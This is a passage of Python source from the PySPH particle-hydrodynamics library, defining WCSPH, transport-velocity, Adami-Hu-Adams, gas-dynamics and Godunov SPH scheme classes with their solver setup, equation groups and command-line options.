            default=None,
            help="Beta for the artificial viscosity."
        )
        group.add_argument(
            "--delta", action="store", type=float, dest="delta",
            default=None,
            help="Delta for the delta-SPH."
        )
        group.add_argument(
            "--gamma", action="store", type=float, dest="gamma",
            default=None,
            help="Gamma for the state equation."
        )
        add_bool_argument(
            group, 'tensile-correction', dest='tensile_correction',
            help="Use tensile instability correction.",
            default=None
        )
        add_bool_argument(
            group, "hg-correction", dest="hg_correction",
            help="Use the Hughes Graham correction.",
            default=None
        )
        add_bool_argument(
            group, "update-h", dest="update_h",
            help="Update the smoothing length as per Ferrari et al.",
            default=None
        )
        add_bool_argument(
            group, "delta-sph", dest="delta_sph",
            help="Use the delta-SPH correction terms.",
            default=None
        )
        add_bool_argument(
            group, "summation-density", dest="summation_density",
            help="Use summation density instead of continuity.",
            default=None
        )

    def consume_user_options(self, options):
        # Copy the parsed options onto the scheme (None keeps __init__ value).
        vars = ['gamma', 'tensile_correction', 'hg_correction',
                'update_h', 'delta_sph', 'alpha', 'beta',
                'summation_density']
        data = dict((var, self._smart_getattr(options, var))
                    for var in vars)
        self.configure(**data)

    def get_timestep(self, cfl=0.5):
        # CFL timestep based on the reference smoothing length/sound speed.
        return cfl*self.h0/self.c0

    def configure_solver(self, kernel=None, integrator_cls=None,
                         extra_steppers=None, **kw):
        from pysph.base.kernels import CubicSpline
        if kernel is None:
            kernel = CubicSpline(dim=self.dim)

        steppers = {}
        if extra_steppers is not None:
            steppers.update(extra_steppers)

        from pysph.sph.integrator import PECIntegrator, TVDRK3Integrator
        from pysph.sph.integrator_step import WCSPHStep, WCSPHTVDRK3Step

        cls = integrator_cls if integrator_cls is not None else PECIntegrator
        # TVD-RK3 requires its dedicated stepper.
        step_cls = WCSPHTVDRK3Step if cls is TVDRK3Integrator else WCSPHStep
        for name in self.fluids + self.solids:
            if name not in steppers:
                steppers[name] = step_cls()

        integrator = cls(**steppers)

        from pysph.solver.solver import Solver
        if 'dt' not in kw:
            kw['dt'] = self.get_timestep()
        self.solver = Solver(
            dim=self.dim, integrator=integrator, kernel=kernel, **kw
        )

    def get_equations(self):
        from pysph.sph.equation import Group
        from pysph.sph.wc.basic import (
            MomentumEquation, TaitEOS, TaitEOSHGCorrection,
            UpdateSmoothingLengthFerrari
        )
        from pysph.sph.wc.basic import (ContinuityEquationDeltaSPH,
                                        ContinuityEquationDeltaSPHPreStep,
                                        MomentumEquationDeltaSPH)
        from pysph.sph.basic_equations import \
            (ContinuityEquation, SummationDensity, XSPHCorrection)
        from pysph.sph.wc.viscosity import (LaminarViscosity,
                                            LaminarViscosityDeltaSPH)
        from pysph.sph.wc.kernel_correction import (GradientCorrectionPreStep,
                                                    GradientCorrection)
        equations = []
        g1 = []
        all = self.fluids + self.solids

        # Optional density by summation, computed before the EOS.
        if self.summation_density:
            g0 = []
            for name in self.fluids:
                g0.append(SummationDensity(dest=name, sources=all))
            equations.append(Group(equations=g0, real=False))

        # Equation of state for fluids (and solids, see below).
        for name in self.fluids:
            g1.append(TaitEOS(
                dest=name, sources=None, rho0=self.rho0, c0=self.c0,
                gamma=self.gamma
            ))

        # This correction applies only to solids.
        for name in self.solids:
            if self.hg_correction:
                g1.append(TaitEOSHGCorrection(
                    dest=name, sources=None, rho0=self.rho0, c0=self.c0,
                    gamma=self.gamma
                ))
            else:
                g1.append(TaitEOS(
                    dest=name, sources=None, rho0=self.rho0, c0=self.c0,
                    gamma=self.gamma
                ))

        equations.append(Group(equations=g1, real=False))

        # Kernel-gradient correction pre-pass needed by delta-SPH.
        if self.delta_sph and not self.summation_density:
            eq2_pre = []
            for name in self.fluids:
                eq2_pre.append(
                    GradientCorrectionPreStep(dest=name, sources=[name],
                                              dim=self.dim)
                )
            equations.append(Group(equations=eq2_pre, real=False))

            eq2 = []
            for name in self.fluids:
                eq2.extend([
                    GradientCorrection(dest=name, sources=[name]),
                    ContinuityEquationDeltaSPHPreStep(
                        dest=name, sources=[name]
                    )])
            equations.append(Group(equations=eq2))

        g2 = []
        for name in self.solids:
            g2.append(ContinuityEquation(dest=name, sources=self.fluids))

        for name in self.fluids:
            if not self.summation_density:
                g2.append(
                    ContinuityEquation(dest=name, sources=all)
                )
            if self.delta_sph and not self.summation_density:
                g2.append(
                    ContinuityEquationDeltaSPH(
                        dest=name, sources=[name], c0=self.c0,
                        delta=self.delta
                    ))
            # This is required since MomentumEquation (ME) adds artificial
            # viscosity (AV), so make alpha 0.0 for ME and enable delta sph AV.
            alpha = 0.0 if self.delta_sph else self.alpha
            g2.append(
                MomentumEquation(
                    dest=name, sources=all, c0=self.c0,
                    alpha=alpha, beta=self.beta,
                    gx=self.gx, gy=self.gy, gz=self.gz,
                    tensile_correction=self.tensile_correction
                ))
            if self.delta_sph:
                g2.append(
                    MomentumEquationDeltaSPH(
                        dest=name, sources=[name], rho0=self.rho0, c0=self.c0,
                        alpha=self.alpha
                    ))
            g2.append(XSPHCorrection(dest=name, sources=[name]))

            # Physical (laminar) viscosity, inserted before XSPHCorrection.
            if abs(self.nu) > 1e-14:
                if self.delta_sph:
                    eq = LaminarViscosityDeltaSPH(
                        dest=name, sources=all, dim=self.dim, rho0=self.rho0,
                        nu=self.nu
                    )
                else:
                    eq = LaminarViscosity(
                        dest=name, sources=all, nu=self.nu
                    )
                g2.insert(-1, eq)
        equations.append(Group(equations=g2))

        if self.update_h:
            g3 = [
                UpdateSmoothingLengthFerrari(
                    dest=x, sources=None, dim=self.dim, hdx=self.hdx
                ) for x in self.fluids
            ]
            equations.append(Group(equations=g3, real=False))

        return equations

    def setup_properties(self, particles, clean=True):
        """Add the WCSPH particle properties (from a template particle
        array), plus the delta-SPH work arrays when enabled."""
        from pysph.base.utils import get_particle_array_wcsph
        dummy = get_particle_array_wcsph(name='junk')
        props = list(dummy.properties.keys())
        output_props = ['x', 'y', 'z', 'u', 'v', 'w', 'rho', 'm', 'h',
                        'pid', 'gid', 'tag', 'p']
        if self.delta_sph:
            delta_sph_props = [
                {'name': 'm_mat', 'stride': 9},
                {'name': 'gradrho', 'stride': 3},
            ]
            props += delta_sph_props
        for pa in particles:
            self._ensure_properties(pa, props, clean)
            pa.set_output_arrays(output_props)
            if pa.name in self.solids:
                # This is the load balancing weight for the solid particles.
                # They do less work so we reduce the weight.
                if 'lb_weight' not in pa.constants:
                    pa.add_constant('lb_weight', 0.1)
class TVFScheme(Scheme):
    """Transport Velocity Formulation (TVF) scheme.

    Builds the SPH equations and solver for the transport-velocity
    formulation (Adami, Hu & Adams style), with optional artificial
    viscosity and damped initial accelerations.
    """

    def __init__(self, fluids, solids, dim, rho0, c0, nu, p0, pb, h0,
                 gx=0.0, gy=0.0, gz=0.0, alpha=0.0, tdamp=0.0):
        """
        Parameters
        ----------
        fluids: list
            List of names of fluid particle arrays.
        solids: list
            List of names of solid (boundary) particle arrays.
        dim: int
            Dimensionality of the problem.
        rho0: float
            Reference density.
        c0: float
            Reference speed of sound.
        nu: float
            Kinematic viscosity.
        p0: float
            Reference pressure for the state equation.
        pb: float
            Background pressure for the transport velocity.
        h0: float
            Reference smoothing length (used for the timestep estimate).
        gx, gy, gz: float
            Body force per unit mass along each axis.
        alpha: float
            Artificial viscosity parameter.
        tdamp: float
            Time for which the accelerations are damped.
        """
        self.fluids = fluids
        self.solids = solids
        self.solver = None
        self.rho0 = rho0
        self.c0 = c0
        self.pb = pb
        self.p0 = p0
        self.nu = nu
        self.dim = dim
        self.h0 = h0
        self.gx = gx
        self.gy = gy
        self.gz = gz
        self.alpha = alpha
        # BUGFIX: this was hard-coded to 0.0, silently discarding the
        # user-supplied ``tdamp`` (get_equations passes self.tdamp on to
        # MomentumEquationPressureGradient, so damping never happened).
        self.tdamp = tdamp

    def add_user_options(self, group):
        """Add scheme-specific command-line options to ``group``."""
        group.add_argument(
            "--alpha", action="store", type=float, dest="alpha",
            default=None,
            help="Alpha for the artificial viscosity."
        )
        group.add_argument(
            "--tdamp", action="store", type=float, dest="tdamp",
            default=None,
            help="Time for which the accelerations are damped."
        )

    def consume_user_options(self, options):
        """Copy parsed command-line options onto the scheme attributes."""
        opt_names = ['alpha', 'tdamp']
        # _smart_getattr keeps the current attribute when an option is None
        # (i.e. was not given on the command line).
        data = dict((name, self._smart_getattr(options, name))
                    for name in opt_names)
        self.configure(**data)

    def get_timestep(self, cfl=0.25):
        """Return a stable timestep from the CFL and viscous conditions."""
        dt_cfl = cfl * self.h0/self.c0
        if self.nu > 1e-12:
            dt_viscous = 0.125 * self.h0**2/self.nu
        else:
            # No (significant) viscosity: make the viscous limit inactive.
            dt_viscous = 1.0
        dt_force = 1.0
        return min(dt_cfl, dt_viscous, dt_force)

    def configure_solver(self, kernel=None, integrator_cls=None,
                         extra_steppers=None, **kw):
        """Configure the solver to be generated.

        Parameters
        ----------
        kernel : Kernel instance.
            Kernel to use, if none is passed a default one is used.
        integrator_cls : pysph.sph.integrator.Integrator
            Integrator class to use, use sensible default if none is
            passed.
        extra_steppers : dict
            Additional integration stepper instances as a dict.
        **kw : extra arguments
            Any additional keyword args are passed to the solver instance.
        """
        from pysph.base.kernels import QuinticSpline
        from pysph.sph.integrator_step import TransportVelocityStep
        from pysph.sph.integrator import PECIntegrator
        if kernel is None:
            kernel = QuinticSpline(dim=self.dim)
        steppers = {}
        if extra_steppers is not None:
            steppers.update(extra_steppers)
        # Fluids get a TransportVelocityStep unless the caller overrode it.
        step_cls = TransportVelocityStep
        for fluid in self.fluids:
            if fluid not in steppers:
                steppers[fluid] = step_cls()
        cls = integrator_cls if integrator_cls is not None else PECIntegrator
        integrator = cls(**steppers)
        from pysph.solver.solver import Solver
        self.solver = Solver(
            dim=self.dim, integrator=integrator, kernel=kernel, **kw
        )

    def get_equations(self):
        """Return the list of equation Groups for the TVF scheme.

        Group order matters: density summation, then state equation and
        wall velocities, then wall pressure BC, then momentum equations.
        """
        from pysph.sph.equation import Group
        from pysph.sph.wc.transport_velocity import (
            SummationDensity, StateEquation, MomentumEquationPressureGradient,
            MomentumEquationArtificialViscosity,
            MomentumEquationViscosity, MomentumEquationArtificialStress,
            SolidWallPressureBC, SolidWallNoSlipBC, SetWallVelocity
        )
        equations = []
        all = self.fluids + self.solids
        # Group 1: summation density on the fluids from all arrays.
        g1 = []
        for fluid in self.fluids:
            g1.append(SummationDensity(dest=fluid, sources=all))
        equations.append(Group(equations=g1, real=False))
        # Group 2: fluid state equation and dummy wall velocities.
        g2 = []
        for fluid in self.fluids:
            g2.append(StateEquation(
                dest=fluid, sources=None, p0=self.p0, rho0=self.rho0, b=1.0
            ))
        for solid in self.solids:
            g2.append(SetWallVelocity(dest=solid, sources=self.fluids))
        if len(g2) > 0:
            equations.append(Group(equations=g2, real=False))
        # Group 3: pressure boundary condition on the solid walls.
        g3 = []
        for solid in self.solids:
            g3.append(SolidWallPressureBC(
                dest=solid, sources=self.fluids, b=1.0, rho0=self.rho0,
                p0=self.p0, gx=self.gx, gy=self.gy, gz=self.gz
            ))
        if len(g3) > 0:
            equations.append(Group(equations=g3, real=False))
        # Group 4: momentum equations (pressure gradient, optional
        # artificial/laminar viscosity, no-slip walls, artificial stress).
        g4 = []
        for fluid in self.fluids:
            g4.append(
                MomentumEquationPressureGradient(
                    dest=fluid, sources=all, pb=self.pb, gx=self.gx,
                    gy=self.gy, gz=self.gz, tdamp=self.tdamp
                )
            )
            if self.alpha > 0.0:
                g4.append(
                    MomentumEquationArtificialViscosity(
                        dest=fluid, sources=all, c0=self.c0,
                        alpha=self.alpha
                    )
                )
            if self.nu > 0.0:
                g4.append(
                    MomentumEquationViscosity(
                        dest=fluid, sources=self.fluids, nu=self.nu
                    )
                )
                if len(self.solids) > 0:
                    g4.append(
                        SolidWallNoSlipBC(
                            dest=fluid, sources=self.solids, nu=self.nu
                        )
                    )
            g4.append(
                MomentumEquationArtificialStress(
                    dest=fluid, sources=self.fluids)
            )
        equations.append(Group(equations=g4))
        return equations

    def setup_properties(self, particles, clean=True):
        """Add TVF fluid/solid properties and output arrays to `particles`."""
        from pysph.base.utils import get_particle_array_tvf_fluid, \
            get_particle_array_tvf_solid
        particle_arrays = dict([(p.name, p) for p in particles])
        # Use throwaway template arrays to discover the required properties.
        dummy = get_particle_array_tvf_fluid(name='junk')
        props = list(dummy.properties.keys())
        output_props = dummy.output_property_arrays
        for fluid in self.fluids:
            pa = particle_arrays[fluid]
            self._ensure_properties(pa, props, clean)
            pa.set_output_arrays(output_props)
        dummy = get_particle_array_tvf_solid(name='junk')
        props = list(dummy.properties.keys())
        output_props = dummy.output_property_arrays
        for solid in self.solids:
            pa = particle_arrays[solid]
            self._ensure_properties(pa, props, clean)
            pa.set_output_arrays(output_props)
class AdamiHuAdamsScheme(TVFScheme):
    """This is a scheme similar to that in the paper:

    Adami, S., Hu, X., Adams, N. A generalized wall boundary condition for
    smoothed particle hydrodynamics. Journal of Computational Physics
    2012;231(21):7057-7075.

    The major difference is in how the equations are integrated. The paper
    has a different scheme that does not quite fit in with how things are done
    in PySPH readily so we simply use the WCSPHStep which works well.
    """

    def __init__(self, fluids, solids, dim, rho0, c0, nu, h0,
                 gx=0.0, gy=0.0, gz=0.0, p0=0.0, gamma=7.0,
                 tdamp=0.0, alpha=0.0):
        """
        Parameters
        ----------
        fluids: list
            List of names of fluid particle arrays.
        solids: list
            List of names of solid (boundary) particle arrays.
        dim: int
            Dimensionality of the problem.
        rho0: float
            Reference density.
        c0: float
            Reference speed of sound.
        nu: float
            Kinematic viscosity.
        h0: float
            Reference smoothing length.
        gx, gy, gz: float
            Body force per unit mass along each axis.
        p0: float
            Reference pressure passed to the Tait equation of state.
        gamma: float
            Exponent of the Tait equation of state.
        tdamp: float
            Time for which the accelerations are damped.
        alpha: float
            Artificial viscosity parameter.
        """
        self.fluids = fluids
        self.solids = solids
        self.solver = None
        self.rho0 = rho0
        self.c0 = c0
        self.h0 = h0
        self.p0 = p0
        self.nu = nu
        self.dim = dim
        self.gx = gx
        self.gy = gy
        self.gz = gz
        self.alpha = alpha
        self.gamma = float(gamma)
        self.tdamp = tdamp
        # Recompute derived attributes (the Tait coefficient B).
        self.attributes_changed()

    def add_user_options(self, group):
        """Add command-line options; extends TVFScheme's with ``--gamma``."""
        super(AdamiHuAdamsScheme, self).add_user_options(group)
        group.add_argument(
            "--gamma", action="store", type=float, dest="gamma",
            default=None,
            help="Gamma for the state equation."
        )

    def attributes_changed(self):
        """Recompute the Tait EOS coefficient B after attribute changes."""
        self.B = self.c0*self.c0*self.rho0/self.gamma

    def consume_user_options(self, options):
        """Copy parsed command-line options onto the scheme attributes."""
        vars = ['alpha', 'tdamp', 'gamma']
        # _smart_getattr keeps the current attribute when an option is None.
        data = dict((var, self._smart_getattr(options, var))
                    for var in vars)
        self.configure(**data)

    def configure_solver(self, kernel=None, integrator_cls=None,
                         extra_steppers=None, **kw):
        """Configure the solver to be generated.

        Parameters
        ----------
        kernel : Kernel instance.
            Kernel to use, if none is passed a default one is used.
        integrator_cls : pysph.sph.integrator.Integrator
            Integrator class to use, use sensible default if none is
            passed.
        extra_steppers : dict
            Additional integration stepper instances as a dict.
        **kw : extra arguments
            Any additional keyword args are passed to the solver instance.
        """
        from pysph.base.kernels import QuinticSpline
        from pysph.sph.integrator_step import WCSPHStep
        from pysph.sph.integrator import PECIntegrator
        if kernel is None:
            kernel = QuinticSpline(dim=self.dim)
        steppers = {}
        if extra_steppers is not None:
            steppers.update(extra_steppers)
        # See the class docstring: WCSPHStep is used instead of the
        # paper's own integration scheme.
        step_cls = WCSPHStep
        for fluid in self.fluids:
            if fluid not in steppers:
                steppers[fluid] = step_cls()
        cls = integrator_cls if integrator_cls is not None else PECIntegrator
        integrator = cls(**steppers)
        from pysph.solver.solver import Solver
        self.solver = Solver(
            dim=self.dim, integrator=integrator, kernel=kernel, **kw
        )

    def get_equations(self):
        """Return the equation Groups: EOS/wall velocity, wall pressure BC,
        then continuity + momentum equations. Group order matters."""
        from pysph.sph.equation import Group
        from pysph.sph.wc.basic import TaitEOS
        from pysph.sph.basic_equations import XSPHCorrection
        from pysph.sph.wc.transport_velocity import (
            ContinuityEquation, ContinuitySolid,
            MomentumEquationPressureGradient,
            MomentumEquationViscosity, MomentumEquationArtificialViscosity,
            SolidWallPressureBC, SolidWallNoSlipBC, SetWallVelocity,
            VolumeSummation
        )
        equations = []
        all = self.fluids + self.solids
        # Group: volume summation, Tait EOS on fluids, wall velocities.
        g2 = []
        for fluid in self.fluids:
            g2.append(VolumeSummation(dest=fluid, sources=all))
            g2.append(TaitEOS(
                dest=fluid, sources=None, rho0=self.rho0, c0=self.c0,
                gamma=self.gamma, p0=self.p0
            ))
        for solid in self.solids:
            g2.append(VolumeSummation(dest=solid, sources=all))
            g2.append(SetWallVelocity(dest=solid, sources=self.fluids))
        equations.append(Group(equations=g2, real=False))
        # Group: pressure boundary condition on the walls (uses Tait B).
        g3 = []
        for solid in self.solids:
            g3.append(SolidWallPressureBC(
                dest=solid, sources=self.fluids, b=1.0, rho0=self.rho0,
                p0=self.B, gx=self.gx, gy=self.gy, gz=self.gz
            ))
        equations.append(Group(equations=g3, real=False))
        # Group: continuity, momentum (pb=0.0: no transport-velocity
        # background pressure here), optional viscosities, XSPH correction.
        g4 = []
        for fluid in self.fluids:
            g4.append(
                ContinuityEquation(dest=fluid, sources=self.fluids)
            )
            if self.solids:
                g4.append(
                    ContinuitySolid(dest=fluid, sources=self.solids)
                )
            g4.append(
                MomentumEquationPressureGradient(
                    dest=fluid, sources=all, pb=0.0, gx=self.gx,
                    gy=self.gy, gz=self.gz, tdamp=self.tdamp
                )
            )
            if self.alpha > 0.0:
                g4.append(
                    MomentumEquationArtificialViscosity(
                        dest=fluid, sources=all, c0=self.c0,
                        alpha=self.alpha
                    )
                )
            if self.nu > 0.0:
                g4.append(
                    MomentumEquationViscosity(
                        dest=fluid, sources=self.fluids, nu=self.nu
                    )
                )
            if len(self.solids) > 0:
                g4.append(
                    SolidWallNoSlipBC(
                        dest=fluid, sources=self.solids, nu=self.nu
                    )
                )
            g4.append(XSPHCorrection(dest=fluid, sources=[fluid]))
        equations.append(Group(equations=g4))
        return equations

    def setup_properties(self, particles, clean=True):
        """Extend TVF property setup with the extra fluid properties
        needed by the WCSPH stepper (previous-step values, accelerations)."""
        super(AdamiHuAdamsScheme, self).setup_properties(particles, clean)
        particle_arrays = dict([(p.name, p) for p in particles])
        props = ['cs', 'arho', 'rho0', 'u0', 'v0', 'w0', 'x0', 'y0', 'z0',
                 'ax', 'ay', 'az']
        for fluid in self.fluids:
            pa = particle_arrays[fluid]
            for prop in props:
                pa.add_property(prop)
class GasDScheme(Scheme):
    """Standard gas-dynamics SPH scheme with MPM-style accelerations and
    adaptive smoothing lengths."""

    def __init__(self, fluids, solids, dim, gamma, kernel_factor, alpha1=1.0,
                 alpha2=0.1, beta=2.0, adaptive_h_scheme='mpm',
                 update_alpha1=False, update_alpha2=False,
                 max_density_iterations=250,
                 density_iteration_tolerance=1e-3, has_ghosts=False):
        """
        Parameters
        ----------

        fluids: list
            List of names of fluid particle arrays.
        solids: list
            List of names of solid particle arrays (or boundaries), currently
            not supported
        dim: int
            Dimensionality of the problem.
        gamma: float
            Gamma for Equation of state.
        kernel_factor: float
            Kernel scaling factor.
        alpha1: float
            Artificial viscosity parameter.
        alpha2: float
            Artificial viscosity parameter.
        beta: float
            Artificial viscosity parameter.
        adaptive_h_scheme: str
            Adaptive h scheme to use. One of ['mpm', 'gsph']
        update_alpha1: bool
            Update the alpha1 parameter dynamically.
        update_alpha2: bool
            Update the alpha2 parameter dynamically.
        max_density_iterations: int
            Maximum number of iterations to run for one density step
        density_iteration_tolerance: float
            Maximum difference allowed in two successive density iterations
        has_ghosts: bool
            if ghost particles (either mirror or periodic) is used
        """
        self.fluids = fluids
        self.solids = solids
        self.dim = dim
        self.solver = None
        self.gamma = gamma
        self.alpha1 = alpha1
        self.alpha2 = alpha2
        self.update_alpha1 = update_alpha1
        self.update_alpha2 = update_alpha2
        self.beta = beta
        self.kernel_factor = kernel_factor
        self.adaptive_h_scheme = adaptive_h_scheme
        self.density_iteration_tolerance = density_iteration_tolerance
        self.max_density_iterations = max_density_iterations
        self.has_ghosts = has_ghosts

    def add_user_options(self, group):
        """Add scheme-specific command-line options to ``group``."""
        choices = ['gsph', 'mpm']
        group.add_argument(
            "--adaptive-h", action="store", dest="adaptive_h_scheme",
            default=None, choices=choices,
            help="Specify scheme for adaptive smoothing lengths %s" % choices
        )
        group.add_argument(
            "--alpha1", action="store", type=float, dest="alpha1",
            default=None,
            help="Alpha1 for the artificial viscosity."
        )
        group.add_argument(
            "--beta", action="store", type=float, dest="beta",
            default=None,
            help="Beta for the artificial viscosity."
        )
        group.add_argument(
            "--alpha2", action="store", type=float, dest="alpha2",
            default=None,
            help="Alpha2 for artificial viscosity"
        )
        group.add_argument(
            "--gamma", action="store", type=float, dest="gamma",
            default=None,
            help="Gamma for the state equation."
        )
        add_bool_argument(
            group, "update-alpha1", dest="update_alpha1",
            help="Update the alpha1 parameter.",
            default=None
        )
        add_bool_argument(
            group, "update-alpha2", dest="update_alpha2",
            help="Update the alpha2 parameter.",
            default=None
        )

    def consume_user_options(self, options):
        """Copy parsed command-line options onto the scheme attributes."""
        vars = ['gamma', 'alpha2', 'alpha1', 'beta', 'update_alpha1',
                'update_alpha2', 'adaptive_h_scheme']
        # _smart_getattr keeps the current attribute when an option is None.
        data = dict((var, self._smart_getattr(options, var))
                    for var in vars)
        self.configure(**data)

    def configure_solver(self, kernel=None, integrator_cls=None,
                         extra_steppers=None, **kw):
        """Configure the solver to be generated.

        Parameters
        ----------
        kernel : Kernel instance.
            Kernel to use, if none is passed a default one is used.
        integrator_cls : pysph.sph.integrator.Integrator
            Integrator class to use, use sensible default if none is
            passed.
        extra_steppers : dict
            Additional integration stepper instances as a dict.
        **kw : extra arguments
            Any additional keyword args are passed to the solver instance.
        """
        from pysph.base.kernels import Gaussian
        if kernel is None:
            kernel = Gaussian(dim=self.dim)
        steppers = {}
        if extra_steppers is not None:
            steppers.update(extra_steppers)
        from pysph.sph.integrator import PECIntegrator
        from pysph.sph.integrator_step import GasDFluidStep
        cls = integrator_cls if integrator_cls is not None else PECIntegrator
        step_cls = GasDFluidStep
        for name in self.fluids:
            if name not in steppers:
                steppers[name] = step_cls()
        integrator = cls(**steppers)
        from pysph.solver.solver import Solver
        self.solver = Solver(
            dim=self.dim, integrator=integrator, kernel=kernel, **kw
        )

    def get_equations(self):
        """Return the equation Groups: adaptive-h/density step, EOS,
        wall boundaries, optional ghost updates, then accelerations.
        Group order matters."""
        from pysph.sph.equation import Group
        from pysph.sph.gas_dynamics.basic import (
            ScaleSmoothingLength, UpdateSmoothingLengthFromVolume,
            SummationDensity, IdealGasEOS, MPMAccelerations,
            MPMUpdateGhostProps
        )
        from pysph.sph.gas_dynamics.boundary_equations import WallBoundary
        equations = []
        # Find the optimal 'h'
        if self.adaptive_h_scheme == 'mpm':
            # MPM style: iterate the density summation until the smoothing
            # lengths converge (bounded by max_density_iterations).
            g1 = []
            for fluid in self.fluids:
                g1.append(
                    SummationDensity(
                        dest=fluid, sources=self.fluids, k=self.kernel_factor,
                        density_iterations=True, dim=self.dim,
                        htol=self.density_iteration_tolerance
                    )
                )
            equations.append(Group(
                equations=g1, update_nnps=True, iterate=True,
                max_iterations=self.max_density_iterations
            ))
        elif self.adaptive_h_scheme == 'gsph':
            # GSPH style: scale h up, compute density, derive h from the
            # particle volume, then recompute density with the new h.
            group = []
            for fluid in self.fluids:
                group.append(
                    ScaleSmoothingLength(dest=fluid, sources=None, factor=2.0)
                )
            equations.append(Group(equations=group, update_nnps=True))
            group = []
            for fluid in self.fluids:
                group.append(
                    SummationDensity(
                        dest=fluid, sources=self.fluids, dim=self.dim
                    )
                )
            equations.append(Group(equations=group, update_nnps=False))
            group = []
            for fluid in self.fluids:
                group.append(
                    UpdateSmoothingLengthFromVolume(
                        dest=fluid, sources=None, k=self.kernel_factor,
                        dim=self.dim
                    )
                )
            equations.append(Group(equations=group, update_nnps=True))
            group = []
            for fluid in self.fluids:
                group.append(
                    SummationDensity(
                        dest=fluid, sources=self.fluids, dim=self.dim
                    )
                )
            equations.append(Group(equations=group, update_nnps=False))
        # Done with finding the optimal 'h'
        g2 = []
        for fluid in self.fluids:
            g2.append(IdealGasEOS(dest=fluid, sources=None, gamma=self.gamma))
        equations.append(Group(equations=g2))
        # Wall boundary conditions on the solids.
        g3 = []
        for solid in self.solids:
            g3.append(WallBoundary(solid, sources=self.fluids))
        equations.append(Group(equations=g3))
        if self.has_ghosts:
            # Propagate updated properties to ghost (mirror/periodic)
            # particles before computing accelerations.
            gh = []
            for fluid in self.fluids:
                gh.append(
                    MPMUpdateGhostProps(dest=fluid, sources=None)
                )
            equations.append(Group(equations=gh, real=False))
        g4 = []
        for fluid in self.fluids:
            g4.append(MPMAccelerations(
                dest=fluid, sources=self.fluids + self.solids,
                alpha1_min=self.alpha1,
                alpha2_min=self.alpha2, beta=self.beta,
                update_alpha1=self.update_alpha1,
                update_alpha2=self.update_alpha2
            ))
        equations.append(Group(equations=g4))
        return equations

    def setup_properties(self, particles, clean=True):
        """Add gas-dynamics properties and output arrays to `particles`."""
        from pysph.base.utils import get_particle_array_gasd
        import numpy
        particle_arrays = dict([(p.name, p) for p in particles])
        # Use a throwaway template array to discover required properties.
        dummy = get_particle_array_gasd(name='junk')
        props = list(dummy.properties.keys())
        output_props = dummy.output_property_arrays
        for fluid in self.fluids:
            pa = particle_arrays[fluid]
            self._ensure_properties(pa, props, clean)
            # orig_idx records each particle's original index so particles
            # can be tracked after sorting/load balancing.
            pa.add_property('orig_idx', type='int')
            nfp = pa.get_number_of_particles()
            pa.orig_idx[:] = numpy.arange(nfp)
            pa.set_output_arrays(output_props)
        # Solids additionally need the wall-boundary work arrays.
        solid_props = set(props) | set('div cs wij htmp'.split(' '))
        for solid in self.solids:
            pa = particle_arrays[solid]
            self._ensure_properties(pa, solid_props, clean)
            pa.set_output_arrays(output_props)
class GSPHScheme(Scheme):
    """Godunov SPH (GSPH) scheme: accelerations are computed from
    Riemann-solver solutions between particle pairs."""

    def __init__(self, fluids, solids, dim, gamma, kernel_factor, g1=0.0,
                 g2=0.0, rsolver=2, interpolation=1, monotonicity=1,
                 interface_zero=True, hybrid=False, blend_alpha=5.0, tf=1.0,
                 niter=20, tol=1e-6, has_ghosts=False):
        """
        Parameters
        ----------

        fluids: list
            List of names of fluid particle arrays.
        solids: list
            List of names of solid particle arrays (or boundaries), currently
            not supported
        dim: int
            Dimensionality of the problem.
        gamma: float
            Gamma for Equation of state.
        kernel_factor: float
            Kernel scaling factor.
        g1, g2 : double
            ADKE style thermal conduction parameters
        rsolver: int
            Riemann solver to use.  See pysph.sph.gas_dynamics.gsph for
            valid options.
        interpolation: int
            Kind of interpolation for the specific volume integrals.
        monotonicity : int
            Type of monotonicity algorithm to use:
            0 : First order GSPH
            1 : I02 algorithm # https://doi.org/10.1006/jcph.2002.7053
            2 : IwIn algorithm # https://doi.org/10.1111/j.1365-2966.2011.19588.x # noqa: E501
        interface_zero : bool
            Set Interface position s^*_{ij} = 0 for the Riemann problem.
        hybrid, blend_alpha : bool, double
            Hybrid scheme and blending alpha value
        tf: double
            Final time used for blending.
        niter: int
            Max number of iterations for iterative Riemann solvers.
        tol: double
            Tolerance for iterative Riemann solvers.
        has_ghosts: bool
            if ghost particles (either mirror or periodic) is used
        """
        self.fluids = fluids
        self.solids = solids
        self.dim = dim
        self.solver = None
        self.gamma = gamma
        self.kernel_factor = kernel_factor
        self.g1 = g1
        self.g2 = g2
        self.rsolver = rsolver
        self.interpolation = interpolation
        self.monotonicity = monotonicity
        self.interface_zero = interface_zero
        self.hybrid = hybrid
        self.blend_alpha = blend_alpha
        self.tf = tf
        self.niter = niter
        self.tol = tol
        self.has_ghosts = has_ghosts
        # Maps from command-line option strings to the integer codes
        # understood by the GSPH equations.
        self.rsolver_choices = {'non_diffusive': 0,
                                'van_leer': 1,
                                'exact': 2,
                                'hllc': 3,
                                'ducowicz': 4,
                                'hlle': 5,
                                'roe': 6,
                                'llxf': 7,
                                'hllc_ball': 8,
                                'hll_ball': 9,
                                'hllsy': 10}
        self.interpolation_choices = {'delta': 0,
                                      'linear': 1,
                                      'cubic': 2}
        self.monotonicity_choices = {'first_order': 0,
                                     'i02': 1,
                                     'iwin': 2}

    def add_user_options(self, group):
        """Add scheme-specific command-line options to ``group``."""
        group.add_argument(
            "--rsolver", action="store", type=str, dest="rsolver",
            default=None, choices=set(self.rsolver_choices.keys()),
            help=f"Riemann solver to use, one of :"
                 f"{set(self.rsolver_choices.keys())}"
        )
        group.add_argument(
            "--interpolation", action="store", type=str, dest="interpolation",
            default=None, choices=set(self.interpolation_choices.keys()),
            help=f"Interpolation algorithm to use, one of :"
                 f"{set(self.interpolation_choices.keys())}"
        )
        group.add_argument(
            "--monotonicity", action="store", type=str, dest="monotonicity",
            default=None, choices=set(self.monotonicity_choices.keys()),
            help=f"Monotonicity algorithm to use, one of :"
                 f"{set(self.monotonicity_choices.keys())}"
        )
        group.add_argument(
            "--g1", action="store", type=float, dest="g1",
            default=None,
            help="ADKE style thermal conduction parameter."
        )
        group.add_argument(
            "--g2", action="store", type=float, dest="g2",
            default=None,
            help="ADKE style thermal conduction parameter."
        )
        group.add_argument(
            "--gamma", action="store", type=float, dest="gamma",
            default=None,
            help="Gamma for the state equation."
        )
        group.add_argument(
            "--blend-alpha", action="store", type=float, dest="blend_alpha",
            default=None,
            help="Blending factor for hybrid scheme."
        )
        add_bool_argument(
            group, "interface-zero", dest="interface_zero",
            help="Set interface position to zero for Riemann problem.",
            default=None
        )
        add_bool_argument(
            group, "hybrid", dest="hybrid",
